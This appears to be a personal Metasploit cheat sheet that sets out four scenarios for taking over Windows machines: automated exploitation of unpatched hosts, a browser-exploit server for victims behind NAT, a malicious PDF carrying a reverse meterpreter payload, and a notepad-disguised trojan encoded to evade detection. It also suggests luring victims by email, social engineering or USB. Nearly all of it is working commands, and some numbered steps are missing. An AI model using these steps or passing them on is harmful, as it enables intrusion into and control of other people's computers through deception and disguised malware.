Case 1: PC must be locally\directly\network-accessible, without AntiVirus and with not patched OS.
1. load Metasploit console
2. activate DB for better performance
3. find by portscan open ports, OS and services
dbmnap -sV -O -p1-65535 192.168.1.2
5. find matching exploits and try them on victims to see if i can break in (for unpatched\not AV-protected PC one or more will work)
db_autopwn -PI135 -p -e -t
7. use remote blind_tcp meterpreter payload
sessions -i 1
...if all is ok - we can operate at remote PC, try
Case 2: PC over NAT
Factors of NAT are:
- attacker can not reach the victim's PC directly by IP
- victim must reach out the attacker first
- attacker needs to use a typical client-side attack scenario (e.g. browser-based exploits or a social engeneering vector of attacks like meterpreter explots, email infected PDF docs, create a malitious site which exploits browser vulns and then lure the victim to it somehow, victim's browser will be exploited, will need to use a meterpreter payload as the victim will have to initiate a connection to atacker etc.)
2. use auxiliary/server/browser_autopwn
3. show options
4. set LHOST 192.168.0.2 (atacker's IP)
5. set URIPATH /
6. set SRVPORT 80
8. from victim's PC just visit http://192.168.0.2/
9. ctrl+c in atacker PC
10. sessions -l
11. sessions -i 1
14. kill 666
Case 3: OS is patched, no AV, soft on the machine is not patched
We will target a PDF. Idea is to send the victim a PDF file containing payload. This connects to attacker's PC and offers him control on the victim's PC.
2. search pdf
3. use windows/fileformat/adobe_pdf_embedded_ex
4. show options
5. ls (we must have some PDF)
6. set INFILENAME /root/somefile.pdf
7. set PAYLOAD windows/meterpreter/reverse_tcp
8. show OPTIONS
9. set LHOST 192.168.0.2
10. exploit -> ready exploit will be deployed somewhere here /root/data/exploits/evil.pdf
11. cp /root/data/exploits/evil.pdf /var/www/utilities/
12. use exploit/multi/handler
13. show options
14. set PAYLOAD windows/meterpreter/reverse_tcp
15. set LHOST 192.168.0.2
17. from the Victim's PC:
Case 4: Scenario-based Hacking: OS and soft are patched, no AV
Use a social engeneering and custom trojan combination.
Trojan can be created using msfpayload and msfencoded.
Idea is to have user to download malware which is sent to him. Malware also can be given to him through USB.
This can be very powerful with a MITM attack (DNS or LAN based).
2. msfpayload windows/meterpreter/reverse_tcp LHOST 192.168.0.2 X > MeterpreterReverseTCP.exe
4. cp MeterpreterReverseTCP.exe /var/www/utilities/
5. use exploit/multi/handler
6. set PAYLOAD windows/meterpreter/reverse_tcp
7. set LHOST 192.168.0.2
8. from Victim's PC access and save locally http://192.168.0.2/utilities/Meterprete
11. msfencode -h
12. msfencode -l
13. msfpayload windows/meterpreter/reverse_tcp LHOST 192.168.0.2 R | msfencode -e x86/shikata_ga_nai -c 4 -t exe -o NotepadTrojan.exe -x /root/hack/notepad.exe -k
14. cp NotepadTrojan.exe /var/www/utiities/
15. on a Victim's PC: access http://192.168.0.2/utilities/ and ctrl+r it, download NotepadTrojan.exe (it must look like regular notepad).
16. execute it
17. ps (we'll see a process NotepadTrojan.exe and explorer.exe).
18. migrate [explorer.exe PID]